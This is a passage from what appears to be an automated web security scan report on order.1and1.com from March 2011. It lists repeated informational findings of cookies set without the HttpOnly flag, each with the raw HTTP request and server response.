GET /xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:44:32 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=dYlcnQUI4YWFhW25kazFpYzAiLGVYUipBNC4tMS4uLSstKygoKyokJyseIB8eG0AuWmZodi4wK1s0Xm0zJicjIicjISQiHCQbMTpyczkuNWVuNCcoJCMoJSIlICMkHR4=; Expires=Fri, 07-Apr-2079 21:58:39 GMT; Path=/
ETag: ee47e0f87c09a3d63c46a18caf2a3a3c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18781


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.49. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrSesub

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrSesub;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:44:54 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=3bGExNDUrVFRUTmFXXjtzbTosNm9iXDRLPjggJCEhIB4gHhsbNTQuMTUoKikoJUo4ZFlbaSEjHk4nUWA9MDEtLDEtKy4sJi4lJC1lZiwhKFhhJzEyLi0yLywvKi0uJyg=; Expires=Fri, 07-Apr-2079 21:59:01 GMT; Path=/
ETag: 132952c0d6bb7a4a7b4abae87cc7b50b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19361


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.50. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrSesub

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrSesub HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:44:50 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1ae0db54ed0ae000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrSesub;jsessionid=0DF1867904FE0D83E8B28BA8A61AB7CD.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.51. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrStat

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:12 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=uaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:59:19 GMT; Path=/
ETag: d67fbe10bae506fcd4ff351782437670
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20433


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.52. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrStat

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrStat HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:45:00 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=471b83efa6aad000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrStat;jsessionid=D0790980DB93A48996F6F1150DCB81CE.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.53. http://order.1and1.com/xml/order/FeatureParallelsPlesk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureParallelsPlesk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureParallelsPlesk HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:19 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=628afd437aeefc00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureParallelsPlesk;jsessionid=E46BA2D43F2853AEB351064581077136.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.54. http://order.1and1.com/xml/order/FeatureParallelsSB

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureParallelsSB

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureParallelsSB HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:49:23 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=138db911f48c1c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureParallelsSB;jsessionid=53CA82B0A773EB5E03A861E29DC9CC18.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.55. http://order.1and1.com/xml/order/FeatureSecurityCertificate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSecurityCertificate

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSecurityCertificate;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:46:10 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDInLl5nLSAhHRwhHjI1MDM0LS4=; Expires=Fri, 07-Apr-2079 22:00:17 GMT; Path=/
ETag: b2159134fd54a5eff19566bcc53f235d
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20771


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.56. http://order.1and1.com/xml/order/FeatureSecurityCertificate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSecurityCertificate

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSecurityCertificate HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:46:03 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4ca34797f0aac000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSecurityCertificate;jsessionid=AF4A8D88496B07F20D4A4A282F3FA19A.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.57. http://order.1and1.com/xml/order/FeatureServerDedOsLinux

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsLinux

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerDedOsLinux HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:41 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=159733db96707000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsLinux;jsessionid=BEB715C3D0AD4FDF3308D32B2D75EEB7.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.58. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsLinuxOpt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerDedOsLinuxOpt HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:13 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7f477cb0efbac400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt;jsessionid=8F4D34F8BF464D4825D77320209A42D0.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.59. http://order.1and1.com/xml/order/FeatureServerDedOsWindows

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsWindows

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerDedOsWindows HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:49:02 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=610a8252a61f9c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsWindows;jsessionid=DCE280F7AFB46473EAD17002BC2D67DE.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.60. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsWindowsOpt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerDedOsWindowsOpt HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:14 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=87e626148423c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
